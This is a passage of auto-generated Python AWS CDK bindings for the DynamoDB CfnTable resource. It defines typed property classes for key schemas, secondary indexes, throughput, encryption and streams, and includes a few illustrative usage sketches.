"""Create a new ``AWS::DynamoDB::Table``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param key_schema: ``AWS::DynamoDB::Table.KeySchema``.
:param attribute_definitions: ``AWS::DynamoDB::Table.AttributeDefinitions``.
:param billing_mode: ``AWS::DynamoDB::Table.BillingMode``.
:param global_secondary_indexes: ``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
:param local_secondary_indexes: ``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
:param point_in_time_recovery_specification: ``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
:param provisioned_throughput: ``AWS::DynamoDB::Table.ProvisionedThroughput``.
:param sse_specification: ``AWS::DynamoDB::Table.SSESpecification``.
:param stream_specification: ``AWS::DynamoDB::Table.StreamSpecification``.
:param table_name: ``AWS::DynamoDB::Table.TableName``.
:param tags: ``AWS::DynamoDB::Table.Tags``.
:param time_to_live_specification: ``AWS::DynamoDB::Table.TimeToLiveSpecification``.
"""
props = CfnTableProps(
key_schema=key_schema,
attribute_definitions=attribute_definitions,
billing_mode=billing_mode,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes,
point_in_time_recovery_specification=point_in_time_recovery_specification,
provisioned_throughput=provisioned_throughput,
sse_specification=sse_specification,
stream_specification=stream_specification,
table_name=table_name,
tags=tags,
time_to_live_specification=time_to_live_specification,
)
jsii.create(CfnTable, self, [scope, id, props])
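# A usage sketch of this low-level construct (attribute/key names are illustrative):
#
#   CfnTable(self, "MyCfnTable",
#       key_schema=[CfnTable.KeySchemaProperty(attribute_name="id", key_type="HASH")],
#       attribute_definitions=[CfnTable.AttributeDefinitionProperty(
#           attribute_name="id", attribute_type="S")],
#       billing_mode="PAY_PER_REQUEST",
#   )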
@jsii.member(jsii_name="fromCloudFormation")
@builtins.classmethod
def from_cloud_formation(
cls,
scope: aws_cdk.core.Construct,
id: str,
resource_attributes: typing.Any,
*,
finder: aws_cdk.core.ICfnFinder,
) -> "CfnTable":
"""A factory method that creates a new instance of this class from an object containing the CloudFormation properties of this resource.
Used in the @aws-cdk/cloudformation-include module.
:param scope: -
:param id: -
:param resource_attributes: -
:param finder: The finder interface used to resolve references across the template.
stability
:stability: experimental
"""
options = aws_cdk.core.FromCloudFormationOptions(finder=finder)
return jsii.sinvoke(
cls, "fromCloudFormation", [scope, id, resource_attributes, options]
)
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self, props: typing.Mapping[str, typing.Any]
) -> typing.Mapping[str, typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@jsii.python.classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@builtins.property
@jsii.member(jsii_name="attrArn")
def attr_arn(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: Arn
"""
return jsii.get(self, "attrArn")
@builtins.property
@jsii.member(jsii_name="attrStreamArn")
def attr_stream_arn(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: StreamArn
"""
return jsii.get(self, "attrStreamArn")
@builtins.property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str, typing.Any]:
return jsii.get(self, "cfnProperties")
@builtins.property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::DynamoDB::Table.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tags
"""
return jsii.get(self, "tags")
@builtins.property
@jsii.member(jsii_name="keySchema")
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
]:
"""``AWS::DynamoDB::Table.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-keyschema
"""
return jsii.get(self, "keySchema")
@key_schema.setter
def key_schema(
self,
value: typing.Union[
aws_cdk.core.IResolvable,
typing.List[typing.Union["KeySchemaProperty", aws_cdk.core.IResolvable]],
],
) -> None:
jsii.set(self, "keySchema", value)
@builtins.property
@jsii.member(jsii_name="attributeDefinitions")
def attribute_definitions(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "AttributeDefinitionProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.AttributeDefinitions``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-attributedef
"""
return jsii.get(self, "attributeDefinitions")
@attribute_definitions.setter
def attribute_definitions(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "AttributeDefinitionProperty"
]
],
]
],
) -> None:
jsii.set(self, "attributeDefinitions", value)
@builtins.property
@jsii.member(jsii_name="billingMode")
def billing_mode(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.BillingMode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-billingmode
"""
return jsii.get(self, "billingMode")
@billing_mode.setter
def billing_mode(self, value: typing.Optional[str]) -> None:
jsii.set(self, "billingMode", value)
@builtins.property
@jsii.member(jsii_name="globalSecondaryIndexes")
def global_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.GlobalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-gsi
"""
return jsii.get(self, "globalSecondaryIndexes")
@global_secondary_indexes.setter
def global_secondary_indexes(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "GlobalSecondaryIndexProperty"
]
],
]
],
) -> None:
jsii.set(self, "globalSecondaryIndexes", value)
@builtins.property
@jsii.member(jsii_name="localSecondaryIndexes")
def local_secondary_indexes(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"]
],
]
]:
"""``AWS::DynamoDB::Table.LocalSecondaryIndexes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-lsi
"""
return jsii.get(self, "localSecondaryIndexes")
@local_secondary_indexes.setter
def local_secondary_indexes(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union[
aws_cdk.core.IResolvable, "LocalSecondaryIndexProperty"
]
],
]
],
) -> None:
jsii.set(self, "localSecondaryIndexes", value)
@builtins.property
@jsii.member(jsii_name="pointInTimeRecoverySpecification")
def point_in_time_recovery_specification(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
]:
"""``AWS::DynamoDB::Table.PointInTimeRecoverySpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-pointintimerecoveryspecification
"""
return jsii.get(self, "pointInTimeRecoverySpecification")
@point_in_time_recovery_specification.setter
def point_in_time_recovery_specification(
self,
value: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "PointInTimeRecoverySpecificationProperty"
]
],
) -> None:
jsii.set(self, "pointInTimeRecoverySpecification", value)
@builtins.property
@jsii.member(jsii_name="provisionedThroughput")
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
]:
"""``AWS::DynamoDB::Table.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-provisionedthroughput
"""
return jsii.get(self, "provisionedThroughput")
@provisioned_throughput.setter
def provisioned_throughput(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "ProvisionedThroughputProperty"]
],
) -> None:
jsii.set(self, "provisionedThroughput", value)
@builtins.property
@jsii.member(jsii_name="sseSpecification")
def sse_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.SSESpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-ssespecification
"""
return jsii.get(self, "sseSpecification")
@sse_specification.setter
def sse_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "SSESpecificationProperty"]
],
) -> None:
jsii.set(self, "sseSpecification", value)
@builtins.property
@jsii.member(jsii_name="streamSpecification")
def stream_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.StreamSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-streamspecification
"""
return jsii.get(self, "streamSpecification")
@stream_specification.setter
def stream_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "StreamSpecificationProperty"]
],
) -> None:
jsii.set(self, "streamSpecification", value)
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> typing.Optional[str]:
"""``AWS::DynamoDB::Table.TableName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-tablename
"""
return jsii.get(self, "tableName")
@table_name.setter
def table_name(self, value: typing.Optional[str]) -> None:
jsii.set(self, "tableName", value)
@builtins.property
@jsii.member(jsii_name="timeToLiveSpecification")
def time_to_live_specification(
self,
) -> typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
]:
"""``AWS::DynamoDB::Table.TimeToLiveSpecification``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-timetolivespecification
"""
return jsii.get(self, "timeToLiveSpecification")
@time_to_live_specification.setter
def time_to_live_specification(
self,
value: typing.Optional[
typing.Union[aws_cdk.core.IResolvable, "TimeToLiveSpecificationProperty"]
],
) -> None:
jsii.set(self, "timeToLiveSpecification", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.AttributeDefinitionProperty",
jsii_struct_bases=[],
name_mapping={
"attribute_name": "attributeName",
"attribute_type": "attributeType",
},
)
class AttributeDefinitionProperty:
def __init__(self, *, attribute_name: str, attribute_type: str) -> None:
"""
:param attribute_name: ``CfnTable.AttributeDefinitionProperty.AttributeName``.
:param attribute_type: ``CfnTable.AttributeDefinitionProperty.AttributeType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html
"""
self._values = {
"attribute_name": attribute_name,
"attribute_type": attribute_type,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.AttributeDefinitionProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html#cfn-dynamodb-attributedef-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def attribute_type(self) -> str:
"""``CfnTable.AttributeDefinitionProperty.AttributeType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-attributedef.html#cfn-dynamodb-attributedef-attributename-attributetype
"""
return self._values.get("attribute_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AttributeDefinitionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
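# Editorial sketch (assumed usage, not generated code): constructing an
# AttributeDefinitionProperty. The attribute name "pk" and the scalar type
# "S" (string; "N" = number, "B" = binary) are illustrative values.
def _example_attribute_definition() -> "CfnTable.AttributeDefinitionProperty":
    return CfnTable.AttributeDefinitionProperty(
        attribute_name="pk",
        attribute_type="S",
    )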
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.GlobalSecondaryIndexProperty",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"key_schema": "keySchema",
"projection": "projection",
"provisioned_throughput": "provisionedThroughput",
},
)
class GlobalSecondaryIndexProperty:
def __init__(
self,
*,
index_name: str,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
projection: typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"
],
provisioned_throughput: typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
] = None,
) -> None:
"""
:param index_name: ``CfnTable.GlobalSecondaryIndexProperty.IndexName``.
:param key_schema: ``CfnTable.GlobalSecondaryIndexProperty.KeySchema``.
:param projection: ``CfnTable.GlobalSecondaryIndexProperty.Projection``.
:param provisioned_throughput: ``CfnTable.GlobalSecondaryIndexProperty.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html
"""
self._values = {
"index_name": index_name,
"key_schema": key_schema,
"projection": projection,
}
if provisioned_throughput is not None:
self._values["provisioned_throughput"] = provisioned_throughput
@builtins.property
def index_name(self) -> str:
"""``CfnTable.GlobalSecondaryIndexProperty.IndexName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-indexname
"""
return self._values.get("index_name")
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``CfnTable.GlobalSecondaryIndexProperty.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def projection(
self,
) -> typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"]:
"""``CfnTable.GlobalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-projection
"""
return self._values.get("projection")
@builtins.property
def provisioned_throughput(
self,
) -> typing.Optional[
typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProvisionedThroughputProperty"
]
]:
"""``CfnTable.GlobalSecondaryIndexProperty.ProvisionedThroughput``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-gsi.html#cfn-dynamodb-gsi-provisionedthroughput
"""
return self._values.get("provisioned_throughput")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GlobalSecondaryIndexProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
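# Editorial sketch (assumed usage, not generated code): a GlobalSecondaryIndexProperty
# combining an index key schema, a projection, and optional provisioned throughput.
# The index name, attribute name, and capacity values are illustrative.
def _example_global_secondary_index() -> "CfnTable.GlobalSecondaryIndexProperty":
    return CfnTable.GlobalSecondaryIndexProperty(
        index_name="byEmail",
        key_schema=[
            CfnTable.KeySchemaProperty(attribute_name="email", key_type="HASH"),
        ],
        projection=CfnTable.ProjectionProperty(projection_type="KEYS_ONLY"),
        # Omit provisioned_throughput when the table uses PAY_PER_REQUEST billing.
        provisioned_throughput=CfnTable.ProvisionedThroughputProperty(
            read_capacity_units=5, write_capacity_units=5
        ),
    )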
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.KeySchemaProperty",
jsii_struct_bases=[],
name_mapping={"attribute_name": "attributeName", "key_type": "keyType"},
)
class KeySchemaProperty:
def __init__(self, *, attribute_name: str, key_type: str) -> None:
"""
:param attribute_name: ``CfnTable.KeySchemaProperty.AttributeName``.
:param key_type: ``CfnTable.KeySchemaProperty.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html
"""
self._values = {
"attribute_name": attribute_name,
"key_type": key_type,
}
@builtins.property
def attribute_name(self) -> str:
"""``CfnTable.KeySchemaProperty.AttributeName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html#aws-properties-dynamodb-keyschema-attributename
"""
return self._values.get("attribute_name")
@builtins.property
def key_type(self) -> str:
"""``CfnTable.KeySchemaProperty.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-keyschema.html#aws-properties-dynamodb-keyschema-keytype
"""
return self._values.get("key_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "KeySchemaProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
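# Editorial sketch: a composite primary key expressed as KeySchemaProperty
# entries. "HASH" marks the partition key and "RANGE" the sort key; the
# attribute names are illustrative.
def _example_key_schema() -> typing.List["CfnTable.KeySchemaProperty"]:
    return [
        CfnTable.KeySchemaProperty(attribute_name="pk", key_type="HASH"),
        CfnTable.KeySchemaProperty(attribute_name="sk", key_type="RANGE"),
    ]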
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.LocalSecondaryIndexProperty",
jsii_struct_bases=[],
name_mapping={
"index_name": "indexName",
"key_schema": "keySchema",
"projection": "projection",
},
)
class LocalSecondaryIndexProperty:
def __init__(
self,
*,
index_name: str,
key_schema: typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
],
projection: typing.Union[
aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"
],
) -> None:
"""
:param index_name: ``CfnTable.LocalSecondaryIndexProperty.IndexName``.
:param key_schema: ``CfnTable.LocalSecondaryIndexProperty.KeySchema``.
:param projection: ``CfnTable.LocalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html
"""
self._values = {
"index_name": index_name,
"key_schema": key_schema,
"projection": projection,
}
@builtins.property
def index_name(self) -> str:
"""``CfnTable.LocalSecondaryIndexProperty.IndexName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-indexname
"""
return self._values.get("index_name")
@builtins.property
def key_schema(
self,
) -> typing.Union[
aws_cdk.core.IResolvable,
typing.List[
typing.Union["CfnTable.KeySchemaProperty", aws_cdk.core.IResolvable]
],
]:
"""``CfnTable.LocalSecondaryIndexProperty.KeySchema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-keyschema
"""
return self._values.get("key_schema")
@builtins.property
def projection(
self,
) -> typing.Union[aws_cdk.core.IResolvable, "CfnTable.ProjectionProperty"]:
"""``CfnTable.LocalSecondaryIndexProperty.Projection``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-lsi.html#cfn-dynamodb-lsi-projection
"""
return self._values.get("projection")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "LocalSecondaryIndexProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.PointInTimeRecoverySpecificationProperty",
jsii_struct_bases=[],
name_mapping={"point_in_time_recovery_enabled": "pointInTimeRecoveryEnabled"},
)
class PointInTimeRecoverySpecificationProperty:
def __init__(
self,
*,
point_in_time_recovery_enabled: typing.Optional[
typing.Union[bool, aws_cdk.core.IResolvable]
] = None,
) -> None:
"""
:param point_in_time_recovery_enabled: ``CfnTable.PointInTimeRecoverySpecificationProperty.PointInTimeRecoveryEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-pointintimerecoveryspecification.html
"""
self._values = {}
if point_in_time_recovery_enabled is not None:
self._values[
"point_in_time_recovery_enabled"
] = point_in_time_recovery_enabled
@builtins.property
def point_in_time_recovery_enabled(
self,
) -> typing.Optional[typing.Union[bool, aws_cdk.core.IResolvable]]:
"""``CfnTable.PointInTimeRecoverySpecificationProperty.PointInTimeRecoveryEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-pointintimerecoveryspecification.html#cfn-dynamodb-table-pointintimerecoveryspecification-pointintimerecoveryenabled
"""
return self._values.get("point_in_time_recovery_enabled")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PointInTimeRecoverySpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
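# Editorial sketch: enabling point-in-time recovery via the property struct.
def _example_point_in_time_recovery() -> "CfnTable.PointInTimeRecoverySpecificationProperty":
    return CfnTable.PointInTimeRecoverySpecificationProperty(
        point_in_time_recovery_enabled=True,
    )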
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.ProjectionProperty",
jsii_struct_bases=[],
name_mapping={
"non_key_attributes": "nonKeyAttributes",
"projection_type": "projectionType",
},
)
class ProjectionProperty:
def __init__(
self,
*,
non_key_attributes: typing.Optional[typing.List[str]] = None,
projection_type: typing.Optional[str] = None,
) -> None:
"""
:param non_key_attributes: ``CfnTable.ProjectionProperty.NonKeyAttributes``.
:param projection_type: ``CfnTable.ProjectionProperty.ProjectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html
"""
self._values = {}
if non_key_attributes is not None:
self._values["non_key_attributes"] = non_key_attributes
if projection_type is not None:
self._values["projection_type"] = projection_type
@builtins.property
def non_key_attributes(self) -> typing.Optional[typing.List[str]]:
"""``CfnTable.ProjectionProperty.NonKeyAttributes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html#cfn-dynamodb-projectionobj-nonkeyatt
"""
return self._values.get("non_key_attributes")
@builtins.property
def projection_type(self) -> typing.Optional[str]:
"""``CfnTable.ProjectionProperty.ProjectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-projectionobject.html#cfn-dynamodb-projectionobj-projtype
"""
return self._values.get("projection_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ProjectionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.ProvisionedThroughputProperty",
jsii_struct_bases=[],
name_mapping={
"read_capacity_units": "readCapacityUnits",
"write_capacity_units": "writeCapacityUnits",
},
)
class ProvisionedThroughputProperty:
def __init__(
self, *, read_capacity_units: jsii.Number, write_capacity_units: jsii.Number
) -> None:
"""
:param read_capacity_units: ``CfnTable.ProvisionedThroughputProperty.ReadCapacityUnits``.
:param write_capacity_units: ``CfnTable.ProvisionedThroughputProperty.WriteCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html
"""
self._values = {
"read_capacity_units": read_capacity_units,
"write_capacity_units": write_capacity_units,
}
@builtins.property
def read_capacity_units(self) -> jsii.Number:
"""``CfnTable.ProvisionedThroughputProperty.ReadCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html#cfn-dynamodb-provisionedthroughput-readcapacityunits
"""
return self._values.get("read_capacity_units")
@builtins.property
def write_capacity_units(self) -> jsii.Number:
"""``CfnTable.ProvisionedThroughputProperty.WriteCapacityUnits``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-provisionedthroughput.html#cfn-dynamodb-provisionedthroughput-writecapacityunits
"""
return self._values.get("write_capacity_units")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ProvisionedThroughputProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
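# Editorial sketch: provisioned throughput of 5 read and 5 write capacity
# units (illustrative values; only meaningful when BillingMode is
# "PROVISIONED").
def _example_provisioned_throughput() -> "CfnTable.ProvisionedThroughputProperty":
    return CfnTable.ProvisionedThroughputProperty(
        read_capacity_units=5,
        write_capacity_units=5,
    )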
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.SSESpecificationProperty",
jsii_struct_bases=[],
name_mapping={
"sse_enabled": "sseEnabled",
"kms_master_key_id": "kmsMasterKeyId",
"sse_type": "sseType",
},
)
class SSESpecificationProperty:
def __init__(
self,
*,
sse_enabled: typing.Union[bool, aws_cdk.core.IResolvable],
kms_master_key_id: typing.Optional[str] = None,
sse_type: typing.Optional[str] = None,
) -> None:
"""
:param sse_enabled: ``CfnTable.SSESpecificationProperty.SSEEnabled``.
:param kms_master_key_id: ``CfnTable.SSESpecificationProperty.KMSMasterKeyId``.
:param sse_type: ``CfnTable.SSESpecificationProperty.SSEType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html
"""
self._values = {
"sse_enabled": sse_enabled,
}
if kms_master_key_id is not None:
self._values["kms_master_key_id"] = kms_master_key_id
if sse_type is not None:
self._values["sse_type"] = sse_type
@builtins.property
def sse_enabled(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnTable.SSESpecificationProperty.SSEEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-sseenabled
"""
return self._values.get("sse_enabled")
@builtins.property
def kms_master_key_id(self) -> typing.Optional[str]:
"""``CfnTable.SSESpecificationProperty.KMSMasterKeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-kmsmasterkeyid
"""
return self._values.get("kms_master_key_id")
@builtins.property
def sse_type(self) -> typing.Optional[str]:
"""``CfnTable.SSESpecificationProperty.SSEType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-table-ssespecification.html#cfn-dynamodb-table-ssespecification-ssetype
"""
return self._values.get("sse_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "SSESpecificationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
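# Editorial sketch: server-side encryption with a customer-managed KMS key.
# The key ARN is a placeholder; "KMS" is the SSEType value DynamoDB expects
# for customer-managed keys.
def _example_sse_specification() -> "CfnTable.SSESpecificationProperty":
    return CfnTable.SSESpecificationProperty(
        sse_enabled=True,
        kms_master_key_id="arn:aws:kms:us-east-1:111122223333:key/EXAMPLE",  # placeholder
        sse_type="KMS",
    )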
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.CfnTable.StreamSpecificationProperty",
jsii_struct_bases=[],
name_mapping={"stream_view_type": "streamViewType"},
)
class StreamSpecificationProperty:
def __init__(self, *, stream_view_type: str) -> None:
"""
:param stream_view_type: ``CfnTable.StreamSpecificationProperty.StreamViewType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-streamspecification.html
"""
self._values = {
"stream_view_type": stream_view_type,
}
@builtins.property
def stream_view_type(self) -> str:
"""``CfnTable.StreamSpecificationProperty.StreamViewType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-dynamodb-streamspecification.html#cfn-dynamodb-streamspecification-streamviewtype
"""
return self._values.get("stream_view_type")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
